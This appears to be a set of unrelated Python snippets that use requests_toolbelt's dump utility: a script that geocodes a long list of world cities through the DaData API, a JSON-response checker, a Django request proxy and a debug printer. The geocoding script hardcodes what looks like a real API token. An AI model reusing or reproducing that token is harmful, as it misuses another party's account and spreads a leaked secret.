#"Ватикан", "Сан-Марино", "Вадуц", "Лобамба", "Люксембург", "Паликир", "Маджуро", "Фунафути", "Мелекеок", "Бир-Лелу", "Монако", "Тарава", "Морони", "Андорра-ла-Велья", "Порт-оф-Спейн", "Кигали", "Мбабане", "Джуба", "Гаага", "Любляна", "Братислава", "Доха", "Подгорица", "Шри-Джаяварденепура-Котте", "Багио", "Додома", "Берн", "Эль-Аюн", "Приштина", "Розо", "Джибути", "Путраджая", "Киото", "Банжул", "Скопье", "Бриджтаун", "Порто-Ново", "Бужумбура", "Кингстаун", "Кастри", "Бастер", "Порт-Луи", "Сент-Джорджес", "Манама", "Сент-Джонс", "Монтевидео", "Ломе", "Тунис", "Абу-Даби", "Ашхабад", "Лусака", "Хараре", "Дили", "Порт-Вила", "Тегусигальпа", "Джорджтаун", "Рейкьявик", "Порт-о-Пренс", "Кампала", "Парамарибо", "Ниамей", "Душанбе", "Асунсьон", "Манагуа", "Фритаун", "Исламабад", "Катманду", "Блумфонтейн", "Претория", "Порт-Морсби", "Хониара", "Панама", "Рабат", "Кишинёв", "Мапуту", "Могадишо", "Маскат", "Коломбо", "Улан-Батор", "Виндхук", "Абуджа", "Бисау", "Амман", "Вильнюс", "Рига", "Бишкек", "Масеру", "Антананариву", "Кито", "Сан-Хосе", "Сан-Сальвадор", "Кингстон", "Нджамена", "Малабо", "Асмэра", "Загреб", "Таллин", "Лилонгве", "Гватемала", "Либревиль", "Сува", "Вальпараисо", "Нуакшот", "Бамако", "Бейрут", "Тбилиси", "Астана", "Вьентьян", "Браззавиль", "Конакри", "Ямусукро", "Оттава", "Белград", "Бандар-Сери-Бегаван", "Сукре", "Бельмопан", "Банги", "Яунде", "Тирана", "Ереван", "Баку", "Пномпень", "Ла-Пас", "Котону", "София", "Минск", "Тхимпху", "Габороне", "Канберра", "Уагадугу", "Сараево", "Нейпьидо", "Нукуалофа", "Харгейса", "Виктория", "Сан-Томе", "Апиа", "Валлетта", "Мале", "Иерусалим", "Прая", "Нассау", "Никосия", "Веллингтон", "Ханой", "Анкара", "Будапешт", "Сана", "Бухарест", "Дамаск", "Лиссабон", "Хартум", "Осло", "Варшава", "Пхеньян", "Дар-эс-Салам", "Дублин", "Монровия", "Куала-Лумпур", "Гавана", "Прага", "Эль-Кувейт", "Санто-Доминго", "Аккра", "Триполи", "Тель-Авив", "Хельсинки", "Копенгаген", "Абиджан", "Бразилиа", "Брюссель", "Дакка", "Луанда", "Алжир", "Янгон", "Сан-Франциско", "Денвер", "Хьюстон", "Майами", "Атланта", "Чикаго", "Каракас", "Киев", "Дубай", "Ташкент", "Мадрид", "Женева", "Стокгольм", "Бангкок", "Лима", "Дакар", "Йоханнесбург", "Амстердам", "Касабланка", "Сеул", "Манила", "Монтеррей", "Берлин", "Урумчи", "Чэнду", "Осака", "Киншаса", "Нью-Дели", "Бангалор", "Афины", "Багдад", "Аддис-Абеба", "Тегеран", "Ванкувер", "Торонто", "Буэнос-Айрес", "Кабул", "Вена", "Мельбурн", "Тайбэй", "Окленд", "Лос-Анджелес", "Вашингтон", "Нью-Йорк", "Лондон", "Стамбул", "Эр-Рияд", "Кейптаун", "Москва", "Мехико", "Лагос", "Рим", "Пекин", "Найроби", "Джакарта", "Богота", "Каир", "Шанхай", "Токио", "Мумбаи", "Париж", "Сантьяго", "Калькутта", "Рио-де-Жанейро", "Сан-Паулу", "Сидней", "Сингапур", "Гонконг" ]; def find_coord(j): for s in j["suggestions"]: if s["data"].get("geo_lon"): lon = s["data"]["geo_lon"] lat = s["data"]["geo_lat"] return (lon, lat) return (None, None) for city in cities: url = "https://suggestions.dadata.ru/suggestions/api/4_1/rs/suggest/address" headers = { "Content-Type": "application/json", "Accept": "application/json", "Authorization": "Token a21ae8d8246ebf44e4c99a8dd9e6786d3a56ca0a"} data = { "query": city, "count":"10", "locations": [ { "country": "*" }] } data = json.dumps(data) r = requests.post(url, data=data, params=data, headers=headers) data = dump.dump_all(r) j = r.json() (lon, lat) = find_coord(j) if lon is not None: print('"{}": ["{}", "{}"],'.format(city, lat, lon))
def requests_response_json( response, request_curl, request_label=None, raise_ex_if_not_json_response=True, ): """Get JSON from response from requests Args: response: request_curl: request_label: raise_ex_if_not_json_response: Returns: """ json_response = None response_extra = {} if request_label: response_extra.update({'request_label': request_label}) try: json_response = response.json() response_details_source = 'json' response_content_length = len(json_response) response_extra.update({ 'response_details_source': response_details_source, 'response_content_length': response_content_length }) except ValueError as json_decode_ex: log.error("Validate JSON Response: Failed: JSONDecodeError", extra=response_extra) data = dump.dump_all(response) pprint(data.decode('utf-8')) pprint(response.text) handle_json_decode_error( response_decode_ex=json_decode_ex, response=response, response_extra=response_extra, request_label=request_label, request_curl=request_curl ) except Exception as ex: log.error("Validate JSON Response: Failed: Exception", extra=response_extra) pprint(response.text) handle_json_decode_error( response_decode_ex=ex, response=response, response_extra=response_extra, request_label=request_label, request_curl=request_curl ) if json_response is None: if raise_ex_if_not_json_response: log.error("Validate JSON Response: Failed: None", extra=response_extra) raise RequestsFortifiedModuleError( error_message="Validate JSON Response: Failed: None", error_request_curl=request_curl, error_code=RequestsFortifiedErrorCodes.REQ_ERR_SOFTWARE ) else: log.warning("Validate JSON Response: None", extra=response_extra) else: log.debug("Validate JSON Response: Valid", extra=response_extra) return json_response
def proxy_request(request, url, host=None, scheme=None, method=None, session=None, headers=None, auth_tuple=None, verify=True, filter_request_headers=False, stream=False, data=None, verbose=False): """ Proxy a django request to another HTTP server. Args: request (object): Django request object url (string): either a full url or a path relative to 'host' host (string): "hostname:port" or "ip-address:port" of target server scheme (string): "http" or "https" method (string): HTTP request method. Currently supports "GET", "POST", "PUT", "HEAD", "DELETE" session (object): requests library Session object headers (dict): a dictionary of HTTP request headers to submit instead of the headers in request.META auth_tuple (2-tuple): ("username", "password") tuple for basic auth verify (bool): whether to validate SSL certificates (setting this to False is not recommended, but can be done for backend servers that require https, but use self-signed certificates. filter_request_headers (bool): if True, the follow request headers will not be proxied: 'Connection', 'X-Real-Ip', 'X-Forwarded-Host' stream (bool): whether the request library should stream the response (see: http://docs.python-requests.org/en/master/user/advanced/#body-content-workflow) data (string): request body - used for POST, PUT, etc. verbose (bool) Returns: django.http.HttpResponse: The response returned by the target http server, wrapped in a Django HttpResponse object. """ method = method if method is not None else request.method scheme = scheme if scheme is not None else request.scheme auth = HTTPBasicAuth(*auth_tuple) if auth_tuple is not None else None headers = headers if headers is not None else _convert_django_META_to_http_headers(request.META) headers['Host'] = host if host is not None else headers.get('Host') if filter_request_headers: headers = {k: v for k, v in headers.items() if k.lower() not in EXCLUDE_HTTP_REQUEST_HEADERS} if not url.startswith("http"): if not url.startswith("/"): raise ValueError("%s url doesn't start with /" % url) if not host: raise ValueError("%s url is a path but no host is specified" % url) url = "%s://%s%s" % (scheme, host, url) if verbose: logger.info("Sending %(method)s request to %(url)s" % locals()) if headers: logger.info(" headers:") for key, value in sorted(headers.items(), key=lambda i: i[0]): logger.info("---> %(key)s: %(value)s" % locals()) if data: logger.info(" data: %(data)s" % locals()) if auth_tuple: logger.info(" auth: %(auth_tuple)s" % locals()) r = session if session is not None else requests.Session() if method == "GET": method_impl = r.get elif method == "POST": method_impl = r.post elif method == "PUT": method_impl = r.put elif method == "HEAD": method_impl = r.head elif method == "DELETE": method_impl = r.delete else: raise ValueError("Unexpected HTTP method: %s. %s" % (method, url)) response = method_impl(url, headers=headers, data=data, auth=auth, stream=stream, verify=verify) response_content = response.raw.read() if stream else response.content if stream: # make sure the connection is released back to the connection pool # (based on http://docs.python-requests.org/en/master/user/advanced/#body-content-workflow) response.close() proxy_response = HttpResponse( content=response_content, status=response.status_code, reason=response.reason, charset=response.encoding ) if verbose: if not stream: data = dump.dump_all(response) logger.info("===> dump - response_data:\n" + str(data)) logger.info(" response: <Response: %s> %s" % (response.status_code, response.reason)) logger.info(" response-headers:") for key, value in sorted(response.headers.items(), key=lambda i: i[0]): logger.info("<--- %(key)s: %(value)s" % locals()) for key, value in response.headers.iteritems(): if key.lower() not in EXCLUDE_HTTP_RESPONSE_HEADERS: proxy_response[key.title()] = value return proxy_response
def debugRequest(req): try: print(dump.dump_all(req).decode('utf-8')) except: # noqa pass